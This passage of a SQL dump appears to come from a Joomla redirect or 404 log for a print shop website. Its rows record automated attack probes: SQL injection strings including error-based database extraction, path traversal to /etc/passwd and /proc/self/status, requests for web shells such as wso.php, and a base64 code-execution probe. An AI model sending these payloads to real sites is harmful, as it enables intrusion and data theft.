/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:01:46','0000-00-00 00:00:00',301),(2693,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind\'+and+3>\'1',NULL,'','',1,0,'2016-12-21 13:01:47','0000-00-00 00:00:00',301),(2694,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind\'+and+3>\'4',NULL,'','',1,0,'2016-12-21 13:01:47','0000-00-00 00:00:00',301),(2695,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind\"+oRdEr+bY+1+--+;',NULL,'','',1,0,'2016-12-21 13:01:49','0000-00-00 00:00:00',301),(2696,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind\"+ORDEr+By+999+--+;',NULL,'','',1,0,'2016-12-21 13:01:50','0000-00-00 00:00:00',301),(2697,'http://ekvatorprint.com.ua/index.php?option=com_users&view=-1\"+AND+(/*!SElEcT*/+8041+FRoM(/*!selEcT*/+COUNT(*),CONCAt((/*!SelEcT*/+concat(0x7c3a3a3a3a,substring(database(),1,52),0x3a3a3a3a7c)+),floor(rand(0)*2))x+FRoM+INFORMATION_SCHEMA.TABLES+GROuP+By+x)a)',NULL,'','',1,0,'2016-12-21 13:01:52','0000-00-00 00:00:00',301),(2698,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:02:02','0000-00-00 00:00:00',301),(2699,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../etc/hosts/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:02:03','0000-00-00 00:00:00',301),(2700,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../proc/self/status/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:02:04','0000-00-00 00:00:00',301),(2701,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../etc/passwd//./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:02:05','0000-00-00 00:00:00',301),(2702,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../etc/hosts//././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:02:06','0000-00-00 00:00:00',301),(2703,'http://ekvatorprint.com.ua/index.php?option=com_users&view=../../../../../../../../../../../../../../../../../../../../../../proc/self/status//././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:02:08','0000-00-00 00:00:00',301),(2704,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind/../../../../../../../../../../../../../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:02:11','0000-00-00 00:00:00',301),(2705,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind/../../../../../../../../../../../../../../../../../../../../../../etc/hosts/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:02:13','0000-00-00 00:00:00',301),(2706,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind/../../../../../../../../../../../../../../../../../../../../../../proc/self/status/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:02:15','0000-00-00 00:00:00',301),(2707,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind/../../../../../../../../../../../../../../../../../../../../../../etc/passwd//././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:02:17','0000-00-00 00:00:00',301),(2708,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind/../../../../../../../../../../../../../../../../../../../../../../etc/hosts//././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.',NULL,'','',1,0,'2016-12-21 13:02:18','0000-00-00 00:00:00',301),(2709,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind/../../../../../../../../../../../../../../../../../../../../../../proc/self/status//./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././',NULL,'','',1,0,'2016-12-21 13:02:20','0000-00-00 00:00:00',301),(2710,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind\"+and+3>\"1',NULL,'','',1,0,'2016-12-21 13:02:21','0000-00-00 00:00:00',301),(2711,'http://ekvatorprint.com.ua/index.php?option=com_users&view=remind\"+and+3>\"4',NULL,'','',1,0,'2016-12-21 13:02:22','0000-00-00 00:00:00',301),(2712,'http://ekvatorprint.com.ua/mobile/print-photo',NULL,'','',1,0,'2016-12-22 02:28:11','0000-00-00 00:00:00',301),(2713,'http://ekvatorprint.com.ua/m/print-photo',NULL,'','',5,0,'2016-12-22 03:37:33','0000-00-00 00:00:00',301),(2714,'http://ekvatorprint.com.ua/wp-includes/class-comments.php?blog=1',NULL,'','',1,0,'2016-12-22 03:42:55','0000-00-00 00:00:00',301),(2715,'http://ekvatorprint.com.ua/htaccess.php?Pro=Team',NULL,'','',1,0,'2016-12-22 09:52:58','0000-00-00 00:00:00',301),(2716,'http://ekvatorprint.com.ua/upload.php',NULL,'','',5,0,'2016-12-23 05:03:32','0000-00-00 00:00:00',301),(2717,'http://ekvatorprint.com.ua/hetlerx.php',NULL,'','',3,0,'2016-12-23 21:54:15','0000-00-00 00:00:00',301),(2718,'http://ekvatorprint.com.ua/administrator/dbconfig.php',NULL,'http://ekvatorprint.com.ua/administrator/dbconfig.php','',2,0,'2016-12-24 19:19:12','0000-00-00 00:00:00',301),(2719,'http://ekvatorprint.com.ua/goog1es.php',NULL,'http://ekvatorprint.com.ua/goog1es.php','',1,0,'2016-12-24 19:22:15','0000-00-00 00:00:00',301),(2720,'http://ekvatorprint.com.ua/apple-touch-icon76x76.png',NULL,'','',5,0,'2016-12-24 20:11:11','0000-00-00 00:00:00',301),(2721,'http://ekvatorprint.com.ua/apple-touch-icon152x152.png',NULL,'','',5,0,'2016-12-24 20:11:11','0000-00-00 00:00:00',301),(2722,'http://ekvatorprint.com.ua/apple-touch-icon120x120.png',NULL,'','',5,0,'2016-12-24 20:11:11','0000-00-00 00:00:00',301),(2723,'http://ekvatorprint.com.ua/Configss.php?check',NULL,'http://ekvatorprint.com.ua/Configss.php?check','',1,0,'2016-12-26 08:38:29','0000-00-00 00:00:00',301),(2724,'http://ekvatorprint.com.ua/administrator/webconfig.txt.php',NULL,'http://ekvatorprint.com.ua/administrator/webconfig.txt.php','',2,0,'2016-12-26 08:38:37','0000-00-00 00:00:00',301),(2725,'http://ekvatorprint.com.ua/libraries/joomla/wso.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/wso.php','',1,0,'2016-12-26 19:53:09','0000-00-00 00:00:00',301),(2726,'http://ekvatorprint.com.ua/xmlrps.php',NULL,'http://ekvatorprint.com.ua/xmlrps.php','',1,0,'2016-12-26 19:55:39','0000-00-00 00:00:00',301),(2727,'http://ekvatorprint.com.ua/static/sprites/defs/svg/sprite.defs.svg',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',1,0,'2016-12-27 07:21:40','0000-00-00 00:00:00',301),(2728,'http://ekvatorprint.com.ua/google-assist.php',NULL,'http://ekvatorprint.com.ua/google-assist.php','',1,0,'2016-12-27 09:19:42','0000-00-00 00:00:00',301),(2729,'http://ekvatorprint.com.ua/Компания ЭкваторПринт производит модульные картины под заказ в городе Харьков: диптих, триптих',NULL,'http://ekvatorprint.com.ua/modulnye-kartiny','',3,0,'2016-12-27 13:45:09','0000-00-00 00:00:00',301),(2730,'http://ekvatorprint.com.ua/wp-admin/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk=',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 15:34:52','0000-00-00 00:00:00',301),(2731,'http://ekvatorprint.com.ua/administrator/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk=',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 15:35:30','0000-00-00 00:00:00',301),(2732,'http://ekvatorprint.com.ua/plugins/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk=',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 15:38:34','0000-00-00 00:00:00',301),(2733,'http://ekvatorprint.com.ua/wp-content/uploads/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk=',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 15:47:44','0000-00-00 00:00:00',301),(2734,'http://ekvatorprint.com.ua/components/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk=',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 15:49:01','0000-00-00 00:00:00',301),(2735,'http://ekvatorprint.com.ua/wp-content/themes/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk=',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 15:50:44','0000-00-00 00:00:00',301),(2736,'http://ekvatorprint.com.ua/wp-content/plugins/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk=',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 15:58:00','0000-00-00 00:00:00',301),(2737,'http://ekvatorprint.com.ua/modules/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk=',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 15:59:16','0000-00-00 00:00:00',301),(2738,'http://ekvatorprint.com.ua/wp-includes/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk=',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 16:00:08','0000-00-00 00:00:00',301),(2739,'http://ekvatorprint.com.ua/libraries/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk=',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 16:00:10','0000-00-00 00:00:00',301),(2740,'http://ekvatorprint.com.ua/wp-content/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk=',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 16:01:16','0000-00-00 00:00:00',301),(2741,'http://ekvatorprint.com.ua/wp-admin/maint/mssqli.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 16:42:25','0000-00-00 00:00:00',301),(2742,'http://ekvatorprint.com.ua/wp-content/plugins/hello-dolly/mssqli.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 16:43:58','0000-00-00 00:00:00',301),(2743,'http://ekvatorprint.com.ua/monte.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 16:51:33','0000-00-00 00:00:00',301),(2744,'http://ekvatorprint.com.ua/wp-snapshots/tmp/mssqli.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 16:55:45','0000-00-00 00:00:00',301),(2745,'http://ekvatorprint.com.ua/mssqli.php',NULL,'ekvatorprint.com.ua','',3,0,'2016-12-27 16:59:13','0000-00-00 00:00:00',301),(2746,'http://ekvatorprint.com.ua/wp-content/themes/twentytwelve/inc/mssqli.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 17:04:08','0000-00-00 00:00:00',301),(2747,'http://ekvatorprint.com.ua/wp-content/common.php',NULL,'ekvatorprint.com.ua','',3,0,'2016-12-27 17:05:04','0000-00-00 00:00:00',301),(2748,'http://ekvatorprint.com.ua/wp-content/uploads/wp-conns.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-27 17:05:46','0000-00-00 00:00:00',301),(2749,'http://ekvatorprint.com.ua/wp-content/plugins/maintenance-mode/languages/mssqli.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 17:07:30','0000-00-00 00:00:00',301),(2750,'http://ekvatorprint.com.ua/templates/wp-conns.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-27 17:07:48','0000-00-00 00:00:00',301),(2751,'http://ekvatorprint.com.ua/wp-content/wp-conns.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-27 17:10:04','0000-00-00 00:00:00',301),(2752,'http://ekvatorprint.com.ua/wp-content/themes/wp-conns.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-27 17:11:09','0000-00-00 00:00:00',301),(2753,'http://ekvatorprint.com.ua/components/wp-conns.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-27 17:14:54','0000-00-00 00:00:00',301),(2754,'http://ekvatorprint.com.ua/wp-conns.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-27 17:16:42','0000-00-00 00:00:00',301),(2755,'http://ekvatorprint.com.ua/wp-includes/fonts/mssqli.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 17:17:37','0000-00-00 00:00:00',301),(2756,'http://ekvatorprint.com.ua/wp-includes/theme-compat/mssqli.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 17:18:17','0000-00-00 00:00:00',301),(2757,'http://ekvatorprint.com.ua/wp-content/uploads/quarantine/mssqli.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 17:19:55','0000-00-00 00:00:00',301),(2758,'http://ekvatorprint.com.ua/wp-content/uploads/2013/07/mssqli.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 17:21:06','0000-00-00 00:00:00',301),(2759,'http://ekvatorprint.com.ua/main_.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 17:21:50','0000-00-00 00:00:00',301),(2760,'http://ekvatorprint.com.ua/wp-includes/theme-compat/productid/mssqli.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 17:23:04','0000-00-00 00:00:00',301),(2761,'http://ekvatorprint.com.ua/wp-content/main_.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 17:23:46','0000-00-00 00:00:00',301),(2762,'http://ekvatorprint.com.ua/wp-content/fmp-jw-files/configs/mssqli.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 17:25:01','0000-00-00 00:00:00',301),(2763,'http://ekvatorprint.com.ua/wp-content/monte.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 17:25:29','0000-00-00 00:00:00',301),(2764,'http://ekvatorprint.com.ua/wp-includes/css/mssqli.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 17:25:49','0000-00-00 00:00:00',301),(2765,'http://ekvatorprint.com.ua/wp-includes/wp-conns.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-27 17:26:08','0000-00-00 00:00:00',301),(2766,'http://ekvatorprint.com.ua/wp-content/plugins/wp-conns.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-27 17:29:34','0000-00-00 00:00:00',301),(2767,'http://ekvatorprint.com.ua/wp-content/uploads/mssqli.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 17:30:24','0000-00-00 00:00:00',301),(2768,'http://ekvatorprint.com.ua/wp-content/uploads/sucuri/mssqli.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 17:30:38','0000-00-00 00:00:00',301),(2769,'http://ekvatorprint.com.ua/libraries/wp-conns.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-27 17:31:25','0000-00-00 00:00:00',301),(2770,'http://ekvatorprint.com.ua/modules/wp-conns.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-27 17:34:02','0000-00-00 00:00:00',301),(2771,'http://ekvatorprint.com.ua/common.php',NULL,'ekvatorprint.com.ua','',4,0,'2016-12-27 17:35:24','0000-00-00 00:00:00',301),(2772,'http://ekvatorprint.com.ua/wp-content/wfcache/phoenixtechsolution.com_portfolio-3/mssqli.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-27 17:36:27','0000-00-00 00:00:00',301),(2773,'http://ekvatorprint.com.ua/wp-admin/wp-conns.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-27 17:44:01','0000-00-00 00:00:00',301),(2774,'http://ekvatorprint.com.ua/mobile/price',NULL,'','',2,0,'2016-12-28 13:54:20','0000-00-00 00:00:00',301),(2775,'http://ekvatorprint.com.ua/templates/general.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:17:47','0000-00-00 00:00:00',301),(2776,'http://ekvatorprint.com.ua/modules/object.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:19:16','0000-00-00 00:00:00',301),(2777,'http://ekvatorprint.com.ua/plugins/session.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:20:19','0000-00-00 00:00:00',301),(2778,'http://ekvatorprint.com.ua/components/title.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:21:48','0000-00-00 00:00:00',301),(2779,'http://ekvatorprint.com.ua/media/template.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:23:00','0000-00-00 00:00:00',301),(2780,'http://ekvatorprint.com.ua/libraries/inc.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:23:09','0000-00-00 00:00:00',301),(2781,'http://ekvatorprint.com.ua/modules/general.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:23:10','0000-00-00 00:00:00',301),(2782,'http://ekvatorprint.com.ua/templates/xml.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:24:44','0000-00-00 00:00:00',301),(2783,'http://ekvatorprint.com.ua/images/test.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:25:35','0000-00-00 00:00:00',301),(2784,'http://ekvatorprint.com.ua/libraries/diff.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:26:19','0000-00-00 00:00:00',301),(2785,'http://ekvatorprint.com.ua/modules/config.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:26:27','0000-00-00 00:00:00',301),(2786,'http://ekvatorprint.com.ua/templates/gallery.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:26:35','0000-00-00 00:00:00',301),(2787,'http://ekvatorprint.com.ua/templates/admin.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 02:27:00','0000-00-00 00:00:00',301),(2788,'http://ekvatorprint.com.ua/includes/inc.php',NULL,'ekvatorprint.com.ua','',4,0,'2016-12-29 02:27:23','0000-00-00 